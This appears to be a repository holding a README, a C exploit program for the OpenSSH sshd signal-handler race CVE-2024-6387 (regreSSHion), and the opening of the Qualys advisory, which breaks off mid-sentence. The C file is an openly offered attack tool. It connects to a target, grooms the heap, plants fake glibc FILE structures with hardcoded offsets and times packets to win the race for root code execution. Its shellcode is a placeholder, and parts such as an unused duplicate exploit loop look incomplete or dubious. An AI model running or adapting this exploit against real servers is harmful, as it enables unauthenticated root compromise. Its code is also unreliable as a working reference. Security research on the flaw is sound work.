├── README.md
├── 7etsuo-regreSSHion.c
└── regresshion.txt


/README.md:
--------------------------------------------------------------------------------
 1 | # cve-2024-6387-poc
 2 | > a signal handler race condition in OpenSSH's server (sshd)
 3 | 
 4 | - 7etsuo
 5 | 
 6 | ## Description
 7 | 
 8 | An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (`sshd`) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the `SIGALRM` handler.
 9 | 
10 | ## Exploit Details
11 | 
12 | ### Vulnerability Summary
13 | 
14 | The exploit targets the `SIGALRM` handler race condition in OpenSSH's `sshd`:
 15 | - **Affected Versions**: OpenSSH 8.5p1 up to, but not including, 9.8p1.
16 | - **Exploit**: Remote code execution as root due to the vulnerable `SIGALRM` handler calling async-signal-unsafe functions.
17 | 


--------------------------------------------------------------------------------
/7etsuo-regreSSHion.c:
--------------------------------------------------------------------------------
  1 | /** 7etsuo-regreSSHion.c
  2 |  * -------------------------------------------------------------------------
  3 |  * SSH-2.0-OpenSSH_9.2p1 Exploit
  4 |  * -------------------------------------------------------------------------
  5 |  *
  6 |  * Exploit Title  : SSH Exploit for CVE-2024-6387 (regreSSHion)
  7 |  * Author         : 7etsuo
  8 |  * Date           : 2024-07-01
  9 |  *
 10 |  * Description:
 11 |  * Targets a signal handler race condition in OpenSSH's
 12 |  * server (sshd) on glibc-based Linux systems. It exploits a vulnerability
 13 |  * where the SIGALRM handler calls async-signal-unsafe functions, leading
 14 |  * to RCE as root.
 15 |  *
 16 |  * Notes:
 17 |  * 1. Shellcode        : Replace placeholder with actual payload.
 18 |  * 2. GLIBC_BASES      : Needs adjustment for specific target systems.
 19 |  * 3. Timing parameters: Fine-tune based on target system responsiveness.
 20 |  * 4. Heap layout      : Requires tweaking for different OpenSSH versions.
 21 |  * 5. File structure offsets: Verify for the specific glibc version.
 22 |  * -------------------------------------------------------------------------
 23 |  */
 24 | 
 25 | #include <stdlib.h>
 26 | #include <unistd.h>
 27 | #include <time.h>
 28 | #include <string.h>
 29 | #include <errno.h>
 30 | #include <fcntl.h>
 31 | #include <stdint.h>
 32 | #include <stdio.h>
 33 | #include <sys/socket.h>
 34 | #include <netinet/in.h>
 35 | #include <arpa/inet.h>
 36 | #include <time.h>
 37 | 
 38 | #define MAX_PACKET_SIZE (256 * 1024)
 39 | #define LOGIN_GRACE_TIME 120
 40 | #define MAX_STARTUPS 100
 41 | #define CHUNK_ALIGN(s) (((s) + 15) & ~15)
 42 | 
 43 | // Possible glibc base addresses (for ASLR bypass)
 44 | uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
 45 | int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);
 46 | 
 47 | // Shellcode placeholder (replace with actual shellcode)
 48 | unsigned char shellcode[] = "\x90\x90\x90\x90";
 49 | 
 50 | int setup_connection (const char *ip, int port);
 51 | void send_packet (int sock, unsigned char packet_type,
 52 |                   const unsigned char *data, size_t len);
 53 | void prepare_heap (int sock);
 54 | void time_final_packet (int sock, double *parsing_time);
 55 | int attempt_race_condition (int sock, double parsing_time,
 56 |                             uint64_t glibc_base);
 57 | double measure_response_time (int sock, int error_type);
 58 | void create_public_key_packet (unsigned char *packet, size_t size,
 59 |                                uint64_t glibc_base);
 60 | void create_fake_file_structure (unsigned char *data, size_t size,
 61 |                                  uint64_t glibc_base);
 62 | void send_ssh_version (int sock);
 63 | int receive_ssh_version (int sock);
 64 | void send_kex_init (int sock);
 65 | int receive_kex_init (int sock);
 66 | int perform_ssh_handshake (int sock);
 67 | 
 68 | int
 69 | main (int argc, char *argv[])
 70 | {
 71 |   if (argc != 3)
 72 |     {
 73 |       fprintf (stderr, "Usage: %s <ip> <port>\n", argv[0]);
 74 |       exit (1);
 75 |     }
 76 | 
 77 |   const char *ip = argv[1];
 78 |   int port = atoi (argv[2]);
 79 |   double parsing_time = 0;
 80 |   int success = 0;
 81 | 
 82 |   srand (time (NULL));
 83 | 
 84 |   // Attempt exploitation for each possible glibc base address
 85 |   for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
 86 |     {
 87 |       uint64_t glibc_base = GLIBC_BASES[base_idx];
 88 |       printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
 89 | 
 90 |       // The advisory mentions "~10,000 tries on average"
 91 |       for (int attempt = 0; attempt < 20000 && !success; attempt++)
 92 |         {
 93 |           if (attempt % 1000 == 0)
 94 |             {
 95 |               printf ("Attempt %d of 20000\n", attempt);
 96 |             }
 97 | 
 98 |           int sock = setup_connection (ip, port);
 99 |           if (sock < 0)
100 |             {
101 |               fprintf (stderr, "Failed to establish connection, attempt %d\n",
102 |                        attempt);
103 |               continue;
104 |             }
105 | 
106 |           if (perform_ssh_handshake (sock) < 0)
107 |             {
108 |               fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt);
109 |               close (sock);
110 |               continue;
111 |             }
112 | 
113 |           prepare_heap (sock);
114 |           time_final_packet (sock, &parsing_time);
115 | 
116 |           if (attempt_race_condition (sock, parsing_time, glibc_base))
117 |             {
118 |               printf ("Possible exploitation success on attempt %d with glibc "
119 |                       "base 0x%lx!\n",
120 |                       attempt, glibc_base);
121 |               success = 1;
122 |               break;
123 |             }
124 | 
125 |           close (sock);
126 |           usleep (100000); // 100ms delay between attempts, as mentioned in the
127 |                            // advisory
128 |         }
129 |     }
130 | 
131 |   return !success;
132 | }
133 | 
134 | int
135 | setup_connection (const char *ip, int port)
136 | {
137 |   int sock = socket (AF_INET, SOCK_STREAM, 0);
138 |   if (sock < 0)
139 |     {
140 |       perror ("socket");
141 |       return -1;
142 |     }
143 | 
144 |   struct sockaddr_in server_addr;
145 |   memset (&server_addr, 0, sizeof (server_addr));
146 |   server_addr.sin_family = AF_INET;
147 |   server_addr.sin_port = htons (port);
148 |   if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
149 |     {
150 |       perror ("inet_pton");
151 |       close (sock);
152 |       return -1;
153 |     }
154 | 
155 |   if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
156 |       < 0)
157 |     {
158 |       perror ("connect");
159 |       close (sock);
160 |       return -1;
161 |     }
162 | 
163 |   // Set socket to non-blocking mode
164 |   int flags = fcntl (sock, F_GETFL, 0);
165 |   fcntl (sock, F_SETFL, flags | O_NONBLOCK);
166 | 
167 |   return sock;
168 | }
169 | 
170 | void
171 | send_packet (int sock, unsigned char packet_type, const unsigned char *data,
172 |              size_t len)
173 | {
174 |   unsigned char packet[MAX_PACKET_SIZE];
175 |   size_t packet_len = len + 5;
176 | 
177 |   packet[0] = (packet_len >> 24) & 0xFF;
178 |   packet[1] = (packet_len >> 16) & 0xFF;
179 |   packet[2] = (packet_len >> 8) & 0xFF;
180 |   packet[3] = packet_len & 0xFF;
181 |   packet[4] = packet_type;
182 | 
183 |   memcpy (packet + 5, data, len);
184 | 
185 |   if (send (sock, packet, packet_len, 0) < 0)
186 |     {
187 |       perror ("send_packet");
188 |     }
189 | }
190 | 
191 | void
192 | send_ssh_version (int sock)
193 | {
194 |   const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n";
195 |   if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
196 |     {
197 |       perror ("send ssh version");
198 |     }
199 | }
200 | 
201 | int
202 | receive_ssh_version (int sock)
203 | {
204 |   char buffer[256];
205 |   ssize_t received;
206 |   do
207 |     {
208 |       received = recv (sock, buffer, sizeof (buffer) - 1, 0);
209 |     }
210 |   while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
211 | 
212 |   if (received > 0)
213 |     {
214 |       buffer[received] = '\0';
215 |       printf ("Received SSH version: %s", buffer);
216 |       return 0;
217 |     }
218 |   else if (received == 0)
219 |     {
220 |       fprintf (stderr, "Connection closed while receiving SSH version\n");
221 |     }
222 |   else
223 |     {
224 |       perror ("receive ssh version");
225 |     }
226 |   return -1;
227 | }
228 | 
229 | void
230 | send_kex_init (int sock)
231 | {
232 |   unsigned char kexinit_payload[36] = { 0 };
233 |   send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
234 | }
235 | 
236 | int
237 | receive_kex_init (int sock)
238 | {
239 |   unsigned char buffer[1024];
240 |   ssize_t received;
241 |   do
242 |     {
243 |       received = recv (sock, buffer, sizeof (buffer), 0);
244 |     }
245 |   while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
246 | 
247 |   if (received > 0)
248 |     {
249 |       printf ("Received KEX_INIT (%zd bytes)\n", received);
250 |       return 0;
251 |     }
252 |   else if (received == 0)
253 |     {
254 |       fprintf (stderr, "Connection closed while receiving KEX_INIT\n");
255 |     }
256 |   else
257 |     {
258 |       perror ("receive kex init");
259 |     }
260 |   return -1;
261 | }
262 | 
263 | int
264 | perform_ssh_handshake (int sock)
265 | {
266 |   send_ssh_version (sock);
267 |   if (receive_ssh_version (sock) < 0)
268 |     return -1;
269 |   send_kex_init (sock);
270 |   if (receive_kex_init (sock) < 0)
271 |     return -1;
272 |   return 0;
273 | }
274 | 
275 | void
276 | prepare_heap (int sock)
277 | {
278 |   // Packet a: Allocate and free tcache chunks
279 |   for (int i = 0; i < 10; i++)
280 |     {
281 |       unsigned char tcache_chunk[64];
282 |       memset (tcache_chunk, 'A', sizeof (tcache_chunk));
283 |       send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
284 |       // These will be freed by the server, populating tcache
285 |     }
286 | 
287 |   // Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
288 |   for (int i = 0; i < 27; i++)
289 |     {
290 |       // Allocate large chunk (~8KB)
291 |       unsigned char large_hole[8192];
292 |       memset (large_hole, 'B', sizeof (large_hole));
293 |       send_packet (sock, 5, large_hole, sizeof (large_hole));
294 | 
295 |       // Allocate small chunk (320B)
296 |       unsigned char small_hole[320];
297 |       memset (small_hole, 'C', sizeof (small_hole));
298 |       send_packet (sock, 5, small_hole, sizeof (small_hole));
299 |     }
300 | 
301 |   // Packet c: Write fake headers, footers, vtable and _codecvt pointers
302 |   for (int i = 0; i < 27; i++)
303 |     {
304 |       unsigned char fake_data[4096];
305 |       create_fake_file_structure (fake_data, sizeof (fake_data),
306 |                                   GLIBC_BASES[0]);
307 |       send_packet (sock, 5, fake_data, sizeof (fake_data));
308 |     }
309 | 
310 |   // Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
311 |   unsigned char large_string[MAX_PACKET_SIZE - 1];
312 |   memset (large_string, 'E', sizeof (large_string));
313 |   send_packet (sock, 5, large_string, sizeof (large_string));
314 | }
315 | 
316 | void
317 | create_fake_file_structure (unsigned char *data, size_t size,
318 |                             uint64_t glibc_base)
319 | {
320 |   memset (data, 0, size);
321 | 
322 |   struct
323 |   {
324 |     void *_IO_read_ptr;
325 |     void *_IO_read_end;
326 |     void *_IO_read_base;
327 |     void *_IO_write_base;
328 |     void *_IO_write_ptr;
329 |     void *_IO_write_end;
330 |     void *_IO_buf_base;
331 |     void *_IO_buf_end;
332 |     void *_IO_save_base;
333 |     void *_IO_backup_base;
334 |     void *_IO_save_end;
335 |     void *_markers;
336 |     void *_chain;
337 |     int _fileno;
338 |     int _flags;
339 |     int _mode;
340 |     char _unused2[40];
341 |     void *_vtable_offset;
342 |   } *fake_file = (void *)data;
343 | 
344 |   // Set _vtable_offset to 0x61 as described in the advisory
345 |   fake_file->_vtable_offset = (void *)0x61;
346 | 
347 |   // Set up fake vtable and _codecvt pointers
348 |   *(uint64_t *)(data + size - 16)
349 |       = glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps)
350 |   *(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt
351 | }
352 | 
353 | void
354 | time_final_packet (int sock, double *parsing_time)
355 | {
356 |   double time_before = measure_response_time (sock, 1);
357 |   double time_after = measure_response_time (sock, 2);
358 |   *parsing_time = time_after - time_before;
359 | 
360 |   printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
361 | }
362 | 
363 | double
364 | measure_response_time (int sock, int error_type)
365 | {
366 |   unsigned char error_packet[1024];
367 |   size_t packet_size;
368 | 
369 |   if (error_type == 1)
370 |     {
371 |       // Error before sshkey_from_blob
372 |       packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
373 |                               "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3");
374 |     }
375 |   else
376 |     {
377 |       // Error after sshkey_from_blob
378 |       packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
379 |                               "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9");
380 |     }
381 | 
382 |   struct timespec start, end;
383 |   clock_gettime (CLOCK_MONOTONIC, &start);
384 | 
385 |   send_packet (sock, 50, error_packet,
386 |                packet_size); // SSH_MSG_USERAUTH_REQUEST
387 | 
388 |   char response[1024];
389 |   ssize_t received;
390 |   do
391 |     {
392 |       received = recv (sock, response, sizeof (response), 0);
393 |     }
394 |   while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
395 | 
396 |   clock_gettime (CLOCK_MONOTONIC, &end);
397 | 
398 |   double elapsed
399 |       = (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9;
400 |   return elapsed;
401 | }
402 | 
403 | void
404 | create_public_key_packet (unsigned char *packet, size_t size,
405 |                           uint64_t glibc_base)
406 | {
407 |   memset (packet, 0, size);
408 | 
409 |   size_t offset = 0;
410 |   for (int i = 0; i < 27; i++)
411 |     {
412 |       // malloc(~4KB) - This is for the large hole
413 |       *(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
414 |       offset += CHUNK_ALIGN (4096);
415 | 
416 |       // malloc(304) - This is for the small hole (potential FILE structure)
417 |       *(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
418 |       offset += CHUNK_ALIGN (304);
419 |     }
420 | 
421 |   // Add necessary headers for the SSH public key format
422 |   memcpy (packet, "ssh-rsa ", 8);
423 | 
424 |   // Place shellcode in the heap via previous allocations
425 |   memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13, shellcode,
426 |           sizeof (shellcode));
427 | 
428 |   // Set up the fake FILE structures within the packet
429 |   for (int i = 0; i < 27; i++)
430 |     {
431 |       create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
432 |                                       + CHUNK_ALIGN (304) * i,
433 |                                   CHUNK_ALIGN (304), glibc_base);
434 |     }
435 | }
436 | 
437 | int
438 | attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
439 | {
440 |   unsigned char final_packet[MAX_PACKET_SIZE];
441 |   create_public_key_packet (final_packet, sizeof (final_packet), glibc_base);
442 | 
443 |   // Send all but the last byte
444 |   if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0)
445 |     {
446 |       perror ("send final packet");
447 |       return 0;
448 |     }
449 | 
450 |   // Precise timing for last byte
451 |   struct timespec start, current;
452 |   clock_gettime (CLOCK_MONOTONIC, &start);
453 | 
454 |   while (1)
455 |     {
456 |       clock_gettime (CLOCK_MONOTONIC, &current);
457 |       double elapsed = (current.tv_sec - start.tv_sec)
458 |                        + (current.tv_nsec - start.tv_nsec) / 1e9;
459 |       if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001))
460 |         { // 1ms before SIGALRM
461 |           if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) < 0)
462 |             {
463 |               perror ("send last byte");
464 |               return 0;
465 |             }
466 |           break;
467 |         }
468 |     }
469 | 
470 |   // Check for successful exploitation
471 |   char response[1024];
472 |   ssize_t received = recv (sock, response, sizeof (response), 0);
473 |   if (received > 0)
474 |     {
475 |       printf ("Received response after exploit attempt (%zd bytes)\n",
476 |               received);
477 |       // Analyze response to determine if we hit the "large" race window
478 |       if (memcmp (response, "SSH-2.0-", 8) != 0)
479 |         {
480 |           printf ("Possible hit on 'large' race window\n");
481 |           return 1;
482 |         }
483 |     }
484 |   else if (received == 0)
485 |     {
486 |       printf (
487 |           "Connection closed by server - possible successful exploitation\n");
488 |       return 1;
489 |     }
490 |   else if (errno == EWOULDBLOCK || errno == EAGAIN)
491 |     {
492 |       printf ("No immediate response from server - possible successful "
493 |               "exploitation\n");
494 |       return 1;
495 |     }
496 |   else
497 |     {
498 |       perror ("recv");
499 |     }
500 |   return 0;
501 | }
502 | 
503 | int
504 | perform_exploit (const char *ip, int port)
505 | {
506 |   int success = 0;
507 |   double parsing_time = 0;
508 |   double timing_adjustment = 0;
509 | 
510 |   for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
511 |     {
512 |       uint64_t glibc_base = GLIBC_BASES[base_idx];
513 |       printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
514 | 
515 |       for (int attempt = 0; attempt < 10000 && !success; attempt++)
516 |         {
517 |           if (attempt % 1000 == 0)
518 |             {
519 |               printf ("Attempt %d of 10000\n", attempt);
520 |             }
521 | 
522 |           int sock = setup_connection (ip, port);
523 |           if (sock < 0)
524 |             {
525 |               fprintf (stderr, "Failed to establish connection, attempt %d\n",
526 |                        attempt);
527 |               continue;
528 |             }
529 | 
530 |           if (perform_ssh_handshake (sock) < 0)
531 |             {
532 |               fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt);
533 |               close (sock);
534 |               continue;
535 |             }
536 | 
537 |           prepare_heap (sock);
538 |           time_final_packet (sock, &parsing_time);
539 | 
540 |           // Implement feedback-based timing strategy
541 |           parsing_time += timing_adjustment;
542 | 
543 |           if (attempt_race_condition (sock, parsing_time, glibc_base))
544 |             {
545 |               printf ("Possible exploitation success on attempt %d with glibc "
546 |                       "base 0x%lx!\n",
547 |                       attempt, glibc_base);
548 |               success = 1;
549 |               // In a real exploit, we would now attempt to interact with the
550 |               // shell
551 |             }
552 |           else
553 |             {
554 |               // Adjust timing based on feedback
555 |               timing_adjustment += 0.00001; // Small incremental adjustment
556 |             }
557 | 
558 |           close (sock);
559 |           usleep (100000); // 100ms delay between attempts, as mentioned in the
560 |                            // advisory
561 |         }
562 |     }
563 | 
564 |   return success;
565 | }


--------------------------------------------------------------------------------
/regresshion.txt:
--------------------------------------------------------------------------------
   1 | Qualys Security Advisory
   2 | 
   3 | regreSSHion: RCE in OpenSSH's server, on glibc-based Linux systems
   4 | (CVE-2024-6387)
   5 | 
   6 | 
   7 | ========================================================================
   8 | Contents
   9 | ========================================================================
  10 | 
  11 | Summary
  12 | SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3 (Debian 3.0r6, from 2005)
  13 | - Theory
  14 | - Practice
  15 | - Timing
  16 | SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3 (Ubuntu 6.06.1, from 2006)
  17 | - Theory, take one
  18 | - Theory, take two
  19 | - Practice
  20 | - Timing
  21 | SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2 (Debian 12.5.0, from 2024)
  22 | - Theory
  23 | - Practice
  24 | - Timing
  25 | Towards an amd64 exploit
  26 | Patches and mitigation
  27 | Acknowledgments
  28 | Timeline
  29 | 
  30 | 
  31 | ========================================================================
  32 | Summary
  33 | ========================================================================
  34 | 
  35 |     All it takes is a leap of faith
  36 |         -- The Interrupters, "Leap of Faith"
  37 | 
  38 | Preliminary note: OpenSSH is one of the most secure programs in the
  39 | world; this vulnerability is one slip-up in an otherwise near-flawless
  40 | implementation. Its defense-in-depth design and code are a model and an
  41 | inspiration, and we thank OpenSSH's developers for their exemplary work.
  42 | 
  43 | We discovered a vulnerability (a signal handler race condition) in
  44 | OpenSSH's server (sshd): if a client does not authenticate within
  45 | LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions),
  46 | then sshd's SIGALRM handler is called asynchronously, but this signal
  47 | handler calls various functions that are not async-signal-safe (for
  48 | example, syslog()). This race condition affects sshd in its default
  49 | configuration.
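
For contrast with the unsafe handler described above, here is a minimal sketch of a SIGALRM handler restricted to async-signal-safe operations. It is not OpenSSH's code: the names grace_expired, grace_alarm_flag_handler, grace_alarm_exit_handler, install_grace_handler, and grace_time_expired are hypothetical. The first handler only sets a volatile sig_atomic_t flag; the second uses only write() and _exit(), both of which POSIX lists as async-signal-safe.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <signal.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical flag: set by the handler, polled by the main loop. */
static volatile sig_atomic_t grace_expired = 0;

/* Variant 1: do nothing but record that the timer fired. */
void grace_alarm_flag_handler(int sig)
{
  (void)sig;
  grace_expired = 1;
}

/* Variant 2: report and terminate using only async-signal-safe calls.
 * No syslog(), no malloc()/free(), no stdio. */
void grace_alarm_exit_handler(int sig)
{
  static const char msg[] = "login grace time exceeded\n";
  (void)sig;
  if (write(STDERR_FILENO, msg, sizeof(msg) - 1) < 0)
    {
      /* Nothing safe to do about a failed write here. */
    }
  _exit(1);
}

/* Install one of the handlers above for SIGALRM; returns 0 on success. */
int install_grace_handler(void (*handler)(int))
{
  struct sigaction sa;
  memset(&sa, 0, sizeof(sa));
  sa.sa_handler = handler;
  sigemptyset(&sa.sa_mask);
  return sigaction(SIGALRM, &sa, NULL);
}

/* Main-loop side: has the grace timer fired yet? */
int grace_time_expired(void)
{
  return grace_expired != 0;
}
```

With the flag variant, any logging happens later in normal program context, after the main loop sees grace_time_expired() return nonzero, so the handler never re-enters the allocator.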
  50 | 
  51 | On investigation, we realized that this vulnerability is in fact a
  52 | regression of CVE-2006-5051 ("Signal handler race condition in OpenSSH
  53 | before 4.4 allows remote attackers to cause a denial of service (crash),
  54 | and possibly execute arbitrary code"), which was reported in 2006 by
  55 | Mark Dowd.
  56 | 
  57 | This regression was introduced in October 2020 (OpenSSH 8.5p1) by commit
  58 | 752250c ("revised log infrastructure for OpenSSH"), which accidentally
  59 | removed an "#ifdef DO_LOG_SAFE_IN_SIGHAND" from sigdie(), a function
  60 | that is directly called by sshd's SIGALRM handler. In other words:
  61 | 
  62 | - OpenSSH < 4.4p1 is vulnerable to this signal handler race condition,
  63 |   if not backport-patched against CVE-2006-5051, or not patched against
  64 |   CVE-2008-4109, which was an incorrect fix for CVE-2006-5051;
  65 | 
  66 | - 4.4p1 <= OpenSSH < 8.5p1 is not vulnerable to this signal handler race
  67 |   condition (because the "#ifdef DO_LOG_SAFE_IN_SIGHAND" that was added
  68 |   to sigdie() by the patch for CVE-2006-5051 transformed this unsafe
  69 |   function into a safe _exit(1) call);
  70 | 
  71 | - 8.5p1 <= OpenSSH < 9.8p1 is vulnerable again to this signal handler
  72 |   race condition (because the "#ifdef DO_LOG_SAFE_IN_SIGHAND" was
  73 |   accidentally removed from sigdie()).
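
The three version ranges above can be sketched as a small classifier. This is an illustration only: the enum and function names are hypothetical, the parser assumes a banner containing "OpenSSH_<major>.<minor>", and versions from 9.8p1 onward are assumed to be fixed. A banner does not show distribution backports, so the result is a first approximation rather than proof that a host is or is not patched.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical labels for the ranges listed in the advisory. */
enum sigalrm_race_status
{
  RACE_VULNERABLE_UNLESS_BACKPORTED, /* OpenSSH < 4.4p1 */
  RACE_NOT_VULNERABLE,               /* 4.4p1 <= OpenSSH < 8.5p1, or >= 9.8p1 */
  RACE_VULNERABLE_REGRESSION         /* 8.5p1 <= OpenSSH < 9.8p1 */
};

/* Compare two (major, minor) pairs; negative, zero, or positive. */
static int version_cmp(int major_a, int minor_a, int major_b, int minor_b)
{
  if (major_a != major_b)
    return major_a < major_b ? -1 : 1;
  if (minor_a != minor_b)
    return minor_a < minor_b ? -1 : 1;
  return 0;
}

/* Map an upstream version number onto the advisory's ranges. */
enum sigalrm_race_status classify_openssh(int major, int minor)
{
  if (version_cmp(major, minor, 4, 4) < 0)
    return RACE_VULNERABLE_UNLESS_BACKPORTED;
  if (version_cmp(major, minor, 8, 5) < 0)
    return RACE_NOT_VULNERABLE;
  if (version_cmp(major, minor, 9, 8) < 0)
    return RACE_VULNERABLE_REGRESSION;
  return RACE_NOT_VULNERABLE;
}

/* Extract major.minor from a banner such as
 * "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2". Returns 0 on success. */
int parse_openssh_banner(const char *banner, int *major, int *minor)
{
  const char *p = strstr(banner, "OpenSSH_");
  if (p == NULL)
    return -1;
  return sscanf(p, "OpenSSH_%d.%d", major, minor) == 2 ? 0 : -1;
}
```

The banner of the third target discussed in this advisory, "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2", parses to 9.2 and falls in the regression range.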
  74 | 
  75 | This vulnerability is exploitable remotely on glibc-based Linux systems,
  76 | where syslog() itself calls async-signal-unsafe functions (for example,
  77 | malloc() and free()): an unauthenticated remote code execution as root,
  78 | because it affects sshd's privileged code, which is not sandboxed and
  79 | runs with full privileges. We have not investigated any other libc or
  80 | operating system; but OpenBSD is notably not vulnerable, because its
  81 | SIGALRM handler calls syslog_r(), an async-signal-safer version of
  82 | syslog() that was invented by OpenBSD in 2001.
  83 | 
  84 | To exploit this vulnerability remotely (to the best of our knowledge,
  85 | CVE-2006-5051 has never been successfully exploited before), we drew
  86 | inspiration from a visionary paper, "Delivering Signals for Fun and
  87 | Profit", which was published in 2001 by Michal Zalewski:
  88 | 
  89 |   https://lcamtuf.coredump.cx/signals.txt
  90 | 
  91 | Nevertheless, we immediately faced three major problems:
  92 | 
  93 | - From a theoretical point of view, we must find a useful code path
  94 |   that, if interrupted at the right time by SIGALRM, leaves sshd in an
  95 |   inconsistent state, and we must then exploit this inconsistent state
  96 |   inside the SIGALRM handler.
  97 | 
  98 | - From a practical point of view, we must find a way to reach this
  99 |   useful code path in sshd, and maximize our chances of interrupting it
 100 |   at the right time.
 101 | 
 102 | - From a timing point of view, we must find a way to further increase
 103 |   our chances of interrupting this useful code path at the right time,
 104 |   remotely.
 105 | 
 106 | To focus on these three problems without having to immediately fight
 107 | against all the modern operating system protections (in particular, ASLR
 108 | and NX), we decided to exploit old OpenSSH versions first, on i386, and
 109 | then, based on this experience, recent versions:
 110 | 
 111 | - First, "SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3", from
 112 |   "debian-30r6-dvd-i386-binary-1_NONUS.iso": this is the first Debian
 113 |   version that has privilege separation enabled by default and that is
 114 |   patched against all the critical vulnerabilities of that era (in
 115 |   particular, CVE-2003-0693 and CVE-2002-0640).
 116 | 
 117 |   To remotely exploit this version, we interrupt a call to free() with
 118 |   SIGALRM (inside sshd's public-key parsing code), leave the heap in an
 119 |   inconsistent state, and exploit this inconsistent state during another
 120 |   call to free(), inside the SIGALRM handler.
 121 | 
 122 |   In our experiments, it takes ~10,000 tries on average to win this race
 123 |   condition; i.e., with 10 connections (MaxStartups) accepted per 600
 124 |   seconds (LoginGraceTime), it takes ~1 week on average to obtain a
 125 |   remote root shell.
 126 | 
 127 | - Second, "SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3", from
 128 |   "ubuntu-6.06.1-server-i386.iso": this is the last Ubuntu version that
 129 |   is still vulnerable to CVE-2006-5051 ("Signal handler race condition
 130 |   in OpenSSH before 4.4").
 131 | 
 132 |   To remotely exploit this version, we interrupt a call to pam_start()
 133 |   with SIGALRM, leave one of PAM's structures in an inconsistent state,
 134 |   and exploit this inconsistent state during a call to pam_end(), inside
 135 |   the SIGALRM handler.
 136 | 
 137 |   In our experiments, it takes ~10,000 tries on average to win this race
 138 |   condition; i.e., with 10 connections (MaxStartups) accepted per 120
 139 |   seconds (LoginGraceTime), it takes ~1-2 days on average to obtain a
 140 |   remote root shell.
 141 | 
 142 | - Finally, "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2", from
 143 |   "debian-12.5.0-i386-DVD-1.iso": this is the current Debian stable
 144 |   version, and it is vulnerable to the regression of CVE-2006-5051.
 145 | 
 146 |   To remotely exploit this version, we interrupt a call to malloc() with
 147 |   SIGALRM (inside sshd's public-key parsing code), leave the heap in an
 148 |   inconsistent state, and exploit this inconsistent state during another
 149 |   call to malloc(), inside the SIGALRM handler (more precisely, inside
 150 |   syslog()).
 151 | 
 152 |   In our experiments, it takes ~10,000 tries on average to win this race
 153 |   condition, so ~3-4 hours with 100 connections (MaxStartups) accepted
 154 |   per 120 seconds (LoginGraceTime). Ultimately, it takes ~6-8 hours on
 155 |   average to obtain a remote root shell, because we can only guess the
 156 |   glibc's address correctly half of the time (because of ASLR).
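
The time estimates in the three cases above follow from simple arithmetic: at most MaxStartups unauthenticated connections can be pending per LoginGraceTime window. A minimal sketch of that calculation follows. The function names are hypothetical, and the model assumes every window is fully used.

```c
/* Expected wall-clock seconds to make `tries` attempts when at most
 * `max_startups` attempts fit in each `login_grace_time`-second window. */
double expected_seconds(double tries, double max_startups,
                        double login_grace_time)
{
  return tries / max_startups * login_grace_time;
}

double seconds_to_hours(double seconds)
{
  return seconds / 3600.0;
}

double seconds_to_days(double seconds)
{
  return seconds / 86400.0;
}
```

With the advisory's figure of ~10,000 tries: 10 connections per 600 seconds gives about 6.9 days (~1 week); 10 per 120 seconds gives about 1.4 days (~1-2 days); 100 per 120 seconds gives about 3.3 hours, doubled to about 6.7 hours when the glibc address guess is right only half of the time. The same formula shows how lowering MaxStartups lengthens the time an attacker needs.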
 157 | 
 158 | This research is still a work in progress:
 159 | 
 160 | - we have targeted virtual machines only, not bare-metal servers, on a
 161 |   mostly stable network link (~10ms packet jitter);
 162 | 
 163 | - we are convinced that various aspects of our exploits can be greatly
 164 |   improved;
 165 | 
 166 | - we have started to work on an amd64 exploit, which is much harder
 167 |   because of the stronger ASLR.
 168 | 
 169 | A few days after we started our work on amd64, we noticed the following
